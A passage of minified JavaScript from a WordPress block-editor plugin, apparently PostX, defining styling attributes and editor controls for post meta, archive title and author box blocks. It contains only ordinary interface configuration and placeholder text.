}"}]},viewHovColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-view-count:hover { color:{{viewHovColor}} }"}]},viewTypo:{type:"object",default:{openTypography:0,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-view-count, \n        {{ULTP}} .ultp-advance-post-meta span.ultp-view-label"}]},viewLabelShow:{type:"boolean",default:!0},viewLabel:{type:"string",default:"View",style:[{depends:[{key:"viewLabelShow",condition:"==",value:!0}]}]},viewLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"viewLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-view-label { color:{{viewLabelColor}} }"}]},viewLabelAlign:{type:"string",default:"after",style:[{depends:[{key:"viewLabelAlign",condition:"==",value:"before"},{key:"viewLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-label {order: -1;margin-right: 5px;}"},{depends:[{key:"viewLabelAlign",condition:"==",value:"after"},{key:"viewLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-label {order: 0; margin-left: 5px;}"}]},viewIconShow:{type:"boolean",default:!1},viewIconStyle:{type:"string",default:"viewCount1",style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}]}]},viewIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count svg { color:{{viewIconColor}}; color:{{viewIconColor}} }"}]},viewIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count svg{ width:{{viewIconSize}}; height:{{viewIconSize}} }"}]},viewIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count svg {margin-right:{{viewIconSpace}}}"},{depends:[{key:"viewIconShow",condition:"==",value:!0},{key:"viewLabelShow",condition:"==",value:!0},{key:"viewLabelAlign",condition:"==",value:"before"}],selector:"{{ULTP}} .ultp-view-count svg { margin:0px {{viewIconSpace}} } \n          {{ULTP}} .ultp-view-label {margin:0px !important;}"}]},viewAlign:{type:"boolean",default:!1,style:[{depends:[{key:"viewCountShow",condition:"==",value:!0}]}]},readColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-readTime-wrap { color:{{readColor}} }"}]},readHovColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-readTime-wrap:hover { color:{{readHovColor}} }"}]},readTypo:{type:"object",default:{openTypography:0,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-readTime-wrap *"}]},readTimePrefix:{type:"boolean",default:!0},readTimeText:{type:"string",default:"Minute Read",0:{depends:[{key:"readTimePrefix",condition:"==",value:!0}]}},readPrefixAlign:{type:"string",default:"after",style:[{depends:[{key:"readPrefixAlign",condition:"==",value:"before"},{key:"readTimePrefix",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-read-label {order: -1;margin-right: 5px;}"},{depends:[{key:"readPrefixAlign",condition:"==",value:"after"},{key:"readTimePrefix",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-read-label {order: 0; margin-left: 5px;}"}]},readTimeIcon:{type:"boolean",default:!1},readIconStyle:{type:"string",default:"readingTime2",style:[{depends:[{key:"readTimeIcon",condition:"==",value:!0}]}]},readIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"readTimeIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-readTime-wrap svg { color:{{readIconColor}}; color:{{readIconColor}}; }"}]},readIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"readTimeIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-readTime-wrap svg { width:{{readIconSize}}; height:{{readIconSize}} }"}]},readIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"readTimeIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-readTime-wrap svg { margin-right:{{readIconSpace}} }"},{depends:[{key:"readTimeIcon",condition:"==",value:!0},{key:"readTimePrefix",condition:"==",value:!0},{key:"readPrefixAlign",condition:"==",value:"before"}],selector:"{{ULTP}} .ultp-readTime-wrap svg { margin:0px {{readIconSpace}} } \n          {{ULTP}} .ultp-read-label { margin:0px !important;}"}]},readAlign:{type:"boolean",default:!1,style:[{depends:[{key:"readTimeShow",condition:"==",value:!0}]}]},catColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-post-cat a { color:{{catColor}} }"}]},catHovColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-post-cat a:hover { color:{{catHovColor}} }"}]},catTypo:{type:"object",default:{openTypography:0,decoration:"none",size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-post-cat a, \n        {{ULTP}} .ultp-advance-post-meta span.ultp-cat-label"}]},catSpace:{type:"object",default:{lg:"7",unit:"px"},style:[{selector:"{{ULTP}} .ultp-post-cat a:not(:first-child) { margin-left:{{catSpace}} }"}]},catLabelShow:{type:"boolean",default:!0},catLabel:{type:"string",default:"Category",style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}]}]},catLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-cat-label { color:{{catLabelColor}} }"}]},catLabelSpace:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-cat-label { margin-right:{{catLabelSpace}};}"}]},catIconShow:{type:"boolean",default:!1},catIconStyle:{type:"string",default:"cat2",style:[{depends:[{key:"catIconShow",condition:"==",value:!0}]}]},catIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"catIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-cat-wrap svg { height:{{catIconSize}}; width:{{catIconSize}} }"}]},catIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"catIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-cat-wrap svg, \n          {{ULTP}} .ultp-cat-wrap svg path, \n          {{ULTP}} .ultp-cat-wrap svg rect{ color:{{catIconColor}}; color:{{catIconColor}} }"}]},catIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"catIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-cat-wrap svg {margin-right:{{catIconSpace}} }"}]},catAlign:{type:"boolean",default:!1,style:[{depends:[{key:"catShow",condition:"==",value:!0}]}]},tagColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-post-tag a { color:{{tagColor}} }"}]},tagHovColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-post-tag a:hover { color:{{tagHovColor}} }"}]},tagTypo:{type:"object",default:{openTypography:0,decoration:"none",size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-post-tag a, \n        {{ULTP}} .ultp-advance-post-meta span.ultp-tag-label"}]},tagSpace:{type:"object",default:{lg:"7",unit:"px"},style:[{selector:"{{ULTP}} .ultp-post-tag a:not(:first-child) { margin-left:{{tagSpace}};}"}]},tagLabelShow:{type:"boolean",default:!0},tagLabel:{type:"string",default:"Tag - ",style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}]}]},tagLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-tag-label { color:{{tagLabelColor}} }"}]},tagLabelSpace:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-tag-label { margin-right:{{tagLabelSpace}};}"}]},tagIconShow:{type:"boolean",default:!1},tagIconStyle:{type:"string",default:"tag2",style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}]}]},tagIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-tag-wrap svg, \n          {{ULTP}} .ultp-tag-wrap svg path {color:{{tagIconColor}}; color:{{tagIconColor}} }"}]},tagIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-tag-wrap svg {height:{{tagIconSize}}; width:{{tagIconSize}}}"}]},tagIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-tag-wrap svg {margin-right:{{tagIconSpace}} }"}]},tagAlign:{type:"boolean",default:!1,style:[{depends:[{key:"tagShow",condition:"==",value:!0}]}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},1565:(e,t,l)=>{"use strict";var o=l(67294),a=l(85977),i=l(89471),n=l(49681);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/post_meta.svg",alt:"Advanced Post Meta"}),category:"postx-site-builder",attributes:i.Z,edit:a.Z,save:()=>null})},94878:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(92637),s=l(31760);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element;function d(e){const{setAttributes:t,name:l,attributes:d,clientId:m,className:g,attributes:{blockId:y,titleShow:b,prefixShow:v,prefixText:h,advanceId:f,showImage:k,layout:w,excerptShow:x,customTaxColor:T,customTaxTitleColor:_,titleTag:C,currentPostId:E}}=e,S={setAttributes:t,name:l,attributes:d,clientId:m};(0,n.S)({blockId:y,clientId:m,currentPostId:E,setAttributes:t,checkRef:!1}),y&&(0,i.Kh)(d,"ultimate-post/archive-title",y);const P="Archive Title",L=ultp_data.url+"assets/img/builder-fallback.jpg",I="#037fff",B="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam molestie aliquet molestie.",U=L?{backgroundImage:`url(${L})`}:{background:`${I}`},M=c({className:`ultp-block-${y} ${g}`,...f&&{id:f}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.If,{store:S,initialOpen:!0,exclude:["columns","columnGridGap","contentTag","openInTab"],include:[{position:0,data:{type:"layout",col:2,imgPath:"assets/img/layouts/archive/popup/ar",block:"archive-title",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/archive/al1.png",demoUrl:"",label:__("Layout 1","ultimate-post"),value:"1"},{img:"assets/img/layouts/archive/al2.png",demoUrl:"",label:__("Layout 2","ultimate-post"),value:"2"}]}}]}),(0,o.createElement)(a.VH,{depend:"titleShow",store:S,exclude:["titlePosition","titleHoverColor","titleLength","titleBackground","titleStyle","titleAnimColor"],include:[{position:0,data:{type:"toggle",key:"customTaxTitleColor",label:__("Specific Color","ultimate-post"),pro:!0}},{position:1,data:{type:"linkbutton",key:"seperatorTaxTitleLink",placeholder:__("Choose Color","ultimate-post"),label:__("Taxonomy Specific (Pro)","ultimate-post"),text:"Choose Color"}}]}),(0,o.createElement)(a.Ny,{depend:"prefixShow",include:[{position:1,data:{type:"toggle",key:"prefixTop",label:__("Show on Top","ultimate-post")}}],store:S}),"2"==w&&(0,o.createElement)(a.HY,{store:S,exclude:["TaxAnimation"]}),"1"==w&&(0,o.createElement)(a.Hn,{depend:"showImage",store:S,exclude:["imgMargin","imgCropSmall","imgCrop","imgAnimation","imgOverlay","imageScale","imgOpacity","overlayColor","imgOverlayType","imgGrayScale","imgHoverGrayScale","imgShadow","imgHoverShadow","imgTab","imgHoverRadius","imgRadius","imgSrcset","imgLazy"],include:[{position:3,data:{type:"alignment",key:"contentAlign",responsive:!1,label:__("Alignment","ultimate-post"),disableJustify:!0}},{position:2,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",store:S,title:__("Description","ultimate-post"),exclude:["showSeoMeta","excerptLimit","showFullExcerpt"]})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:S}),(0,o.createElement)(a.Mg,{store:S}),(0,o.createElement)(a.iv,{store:S}))),(0,a.dH)()),(0,o.createElement)(s.Z,{include:[{type:"layout",col:2,imgPath:"assets/img/layouts/archive/popup/ar",block:"archive-title",key:"layout",options:[{img:"assets/img/layouts/archive/al1.png",demoUrl:"",label:__("Layout 1","ultimate-post"),value:"1"},{img:"assets/img/layouts/archive/al2.png",demoUrl:"",label:__("Layout 2","ultimate-post"),value:"2"}],label:__("Layout","ultimate-post")}],store:S}),(0,o.createElement)("div",M,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:`ultp-block-archive-title  ultp-archive-layout-${w}`},1==w&&(0,o.createElement)("div",null,L&&k&&(0,o.createElement)("img",{className:"ultp-archive-image",src:L,alt:P}),b&&(0,o.createElement)(a.VI,{tag:C,className:"ultp-archive-name",style:_?{color:I}:{}},v&&(0,o.createElement)("span",{className:"ultp-archive-prefix"},h," "),P),x&&(0,o.createElement)("div",{className:"ultp-archive-desc"},B)),2==w&&(0,o.createElement)("div",{className:"ultp-archive-content",style:U},(0,o.createElement)("div",{className:"ultp-archive-overlay",style:T?{backgroundColor:I}:{}}),b&&(0,o.createElement)(a.VI,{tag:C,className:"ultp-archive-name"},v&&(0,o.createElement)("span",{className:"ultp-archive-prefix"},h," "),P),x&&(0,o.createElement)("div",{className:"ultp-archive-desc"},B))))))}},56963:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(92165);const a={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"1"},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-archive-title { text-align:{{contentAlign}}; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-archive-title { text-align:{{contentAlign}}; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-archive-title { text-align:{{contentAlign}}; }"}]},titleShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},prefixShow:{type:"boolean",default:!1},showImage:{type:"boolean",default:!1},titleTag:{type:"string",default:"h1"},customTaxTitleColor:{type:"boolean",default:!1},seperatorTaxTitleLink:{type:"string",default:ultp_data.category_url,style:[{depends:[{key:"customTaxTitleColor",condition:"==",value:!0}]}]},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-name { color:{{titleColor}}; }"},{depends:[{key:"customTaxTitleColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-name { color:{{titleColor}}; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"28",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"32",unit:"px"},transform:"",decoration:"none",family:"",weight:""},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-name"}]},titlePadding:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-name { padding:{{titlePadding}}; }"}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-desc { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:"22",unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-desc"}]},excerptPadding:{type:"object",default:{lg:{top:"0",bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-desc { padding: {{excerptPadding}}; }"}]},prefixText:{type:"string",default:"Sample Prefix Text"},prefixTop:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} .ultp-archive-prefix { display: block; }"}]},prefixColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"prefixShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-prefix { color:{{prefixColor}}; }"}]},prefixTypo:{type:"object",default:{openTypography:1,size:{lg:"",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"",unit:"px"},transform:"",decoration:"none",family:"",weight:""},style:[{depends:[{key:"prefixShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-prefix"}]},prefixPadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"prefixShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-prefix { padding:{{prefixPadding}}; }"}]},imgWidth:{type:"object",default:{lg:"",ulg:"%"},style:[{depends:[{key:"layout",condition:"==",value:["1"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-image { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:["1"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-image {object-fit: cover; height: {{imgHeight}}; }"}]},imgSpacing:{type:"object",default:{lg:"10"},style:[{depends:[{key:"layout",condition:"==",value:["1"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-image { margin-bottom: {{imgSpacing}}px; }"}]},customTaxColor:{type:"boolean",default:!1},seperatorTaxLink:{type:"string",default:ultp_data.category_url,style:[{depends:[{key:"customTaxColor",condition:"==",value:!0}]}]},TaxAnimation:{type:"string",default:"none"},TaxWrapBg:{type:"string",default:"",style:[{depends:[{key:"customTaxColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content .ultp-archive-overlay { background:{{TaxWrapBg}}; }"}]},TaxWrapHoverBg:{type:"string",style:[{depends:[{key:"customTaxColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content:hover .ultp-archive-overlay { background:{{TaxWrapHoverBg}}; }"}]},TaxWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["2"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content"}]},TaxWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["2"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content:hover"}]},TaxWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["2"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content"}]},TaxWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["2"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content:hover"}]},TaxWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["2"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content { border-radius: {{TaxWrapRadius}}; }"}]},TaxWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["2"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content:hover { border-radius: {{TaxWrapHoverRadius}}; }"}]},customOpacityTax:{type:"string",default:.6,style:[{selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content .ultp-archive-overlay { opacity: {{customOpacityTax}}; }"}]},customTaxOpacityHover:{type:"string",default:.9,style:[{selector:"{{ULTP}} .ultp-taxonomy-items li a:hover .ultp-archive-overlay { opacity: {{customTaxOpacityHover}}; }"}]},TaxWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["2"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content { padding: {{TaxWrapPadding}}; }"}]},...(0,o.t)(["advanceAttr"],["loadingColor"])}},53056:(e,t,l)=>{"use strict";var o=l(67294),a=l(94878),i=l(56963),n=l(94772);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/archive-title.svg"}),attributes:i.Z,edit:a.Z,save:()=>null})},62568:(e,t,l)=>{"use strict";l.d(t,{Z:()=>m});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(31760),s=l(48784);const{__}=wp.i18n,{Fragment:p}=wp.element,{InspectorControls:c,RichText:u,useBlockProps:d}=wp.blockEditor;function m(e){const{setAttributes:t,name:l,attributes:m,clientId:g,className:y,attributes:{blockId:b,advanceId:v,layout:h,imgShow:f,writtenByShow:k,writtenByText:w,authorBioShow:x,metaShow:T,metaPosition:_,allPostLinkShow:C,viewAllPostText:E,authorNameTag:S,currentPostId:P}}=e,L={setAttributes:t,name:l,attributes:m,clientId:g};(0,n.S)({blockId:b,clientId:g,currentPostId:P,setAttributes:t,checkRef:!1});const I=(0,o.createElement)("div",{className:"ultp-post-author-image-section ultp-post-author-image-editor"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-author.jpg",className:"ultp-post-author-image",alt:"author_image"}));b&&(0,i.Kh)(m,"ultimate-post/author-box",b);const B=d({className:`ultp-block-${b} ${y}`,...v&&{id:v}});return(0,o.createElement)(p,null,(0,o.createElement)(c,null,(0,o.createElement)(s.Z,{store:L}),(0,a.dH)()),(0,o.createElement)(r.Z,{include:[{type:"layout",block:"post-author",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/builder/auth_box/auth_box1.png",label:"Layout 1",value:"layout1"},{img:"assets/img/layouts/builder/auth_box/auth_box2.png",label:"Layout 2",value:"layout2",pro:!0},{img:"assets/img/layouts/builder/auth_box/auth_box4.png",label:"Layout 3",value:"layout3",pro:!0},{img:"assets/img/layouts/builder/auth_box/auth_box3.png",label:"Layout 4",value:"layout4",pro:!0}]}],store:L}),(0,o.createElement)("div",B,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-author-box ultp-author-box-"+h+"-content"},f&&"layout4"!==h&&I,(0,o.createElement)("div",{className:"ultp-post-author-details"},(0,o.createElement)("div",{className:"ultp-post-author-title"},k&&(0,o.createElement)(u,{key:"editable",tagName:"span",className:"ultp-post-author-written-by",placeholder:__("Change Text…","ultimate-post"),onChange:e=>t({writtenByText:e}),value:w}),(0,o.createElement)(a.VI,{tag:S,className:"ultp-post-author-name"},(0,o.createElement)("a",{href:"#"},"Author Name"))),T&&"top"==_&&(0,o.createElement)("div",{className:"ultp-post-author-meta"},(0,o.createElement)("span",{className:"ultp-total-post"},"72 Posts"),(0,o.createElement)("span",{className:"ultp-total-comment"},"32 Comments")),x&&(0,o.createElement)("div",{className:"ultp-post-author-bio"},(0,o.createElement)("span",{className:"ultp-post-author-bio-meta"},"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour, or randomised words which don't look even slightly believable")),T&&"bottom"==_&&(0,o.createElement)("div",{className:"ultp-post-author-meta"},(0,o.createElement)("span",{className:"ultp-total-post"},"72 Posts"),(0,o.createElement)("span",{className:"ultp-total-comment"},"32 Comments")),C&&(0,o.createElement)("div",{className:"ultp-author-post-link"},(0,o.createElement)("a",{className:"ultp-author-post-link-text",href:"#"},E))),f&&"layout4"===h&&I))))}},48784:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Setting","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:0,data:{type:"layout",block:"post-author",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/builder/auth_box/auth_box1.png",label:"Layout 1",value:"layout1"},{img:"assets/img/layouts/builder/auth_box/auth_box2.png",label:"Layout 2",value:"layout2",pro:!0},{img:"assets/img/layouts/builder/auth_box/auth_box4.png",label:"Layout 3",value:"layout3",pro:!0},{img:"assets/img/layouts/builder/auth_box/auth_box3.png",label:"Layout 4",value:"layout4",pro:!0}]}},{data:{type:"alignment",key:"authorBoxAlign",disableJustify:!0,label:__("Alignment","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Content Style","ultimate-post"),include:[{data:{type:"color2",key:"boxContentBg",label:__("Content Background","ultimate-post")}},{data:{type:"border",key:"boxContentBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"boxContentRadius",label:__("Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"boxContentPad",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],store:e}),(0,o.createElement)(a.T,{title:__("Author Image","ultimate-post"),depend:"imgShow",include:[{data:{type:"range",key:"imgSize",min:0,max:400,step:1,responsive:!0,label:__("Size","ultimate-post")}},{data:{type:"range",key:"imgSpace",min:0,max:250,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Space","ultimate-post")}},{data:{type:"range",key:"imgUp",min:0,max:250,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Image Top Position","ultimate-post")}},{data:{type:"border",key:"imgBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"imgRadius",label:__("Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"toggle",key:"authImgStack",label:__("Stack on Mobile","ultimate-post")}},{data:{type:"group",key:"imgRatio",justify:!0,options:[{value:"100",label:__("Low","ultimate-post")},{value:"200",label:__("Medium","ultimate-post")},{value:"300",label:__("Heigh","ultimate-post")}],label:__("Image Ratio","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Written By Label","ultimate-post"),depend:"writtenByShow",include:[{data:{type:"text",key:"writtenByText",label:__("Text","ultimate-post")}},{data:{type:"color",key:"writtenByColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"writtenByTypo",label:__("Typography","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Author Name","ultimate-post"),include:[{data:{type:"tag",key:"authorNameTag",label:__("Tag","ultimate-post")}},{data:{type:"color",key:"authorNameColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"authorNameHoverColor",label:__("Hover Color","ultimate-post")}},{data:{type:"typography",key:"authorNameTypo",label:__("Typography","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Author Bio","ultimate-post"),depend:"authorBioShow",include:[{data:{type:"color",key:"authorBioColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"authorBioTypo",label:__("Typography","ultimate-post")}},{data:{type:"dimension",key:"authorBioMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}}],store:e}),(0,o.createElement)(a.T,{title:__("Meta","ultimate-post"),depend:"metaShow",include:[{data:{type:"group",key:"metaPosition",label:__("Meta Position","ultimate-post"),justify:!0,options:[{value:"top",label:__("Top","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}},{data:{type:"color",key:"metaColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"metaTypo",label:__("Typography","ultimate-post")}},{data:{type:"color",key:"metaBg",label:__("Background","ultimate-post")}},{data:{type:"dimension",key:"metaPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"metaMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"border",key:"metaBorder",label:__("Border","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("View All Post Link","ultimate-post"),depend:"allPostLinkShow",include:[{data:{type:"text",key:"viewAllPostText",label:__("Text","ultimate-post")}},{data:{type:"typography",key:"viewAllPostTypo",label:__("Typography","ultimate-post")}},{data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"viewAllPostColor",label:__("Color","ultimate-post")},{type:"color2",key:"viewAllPostBg",label:__("Background Color","ultimate-post")},{type:"dimension",key:"viewAllPostRadius",label:__("Border 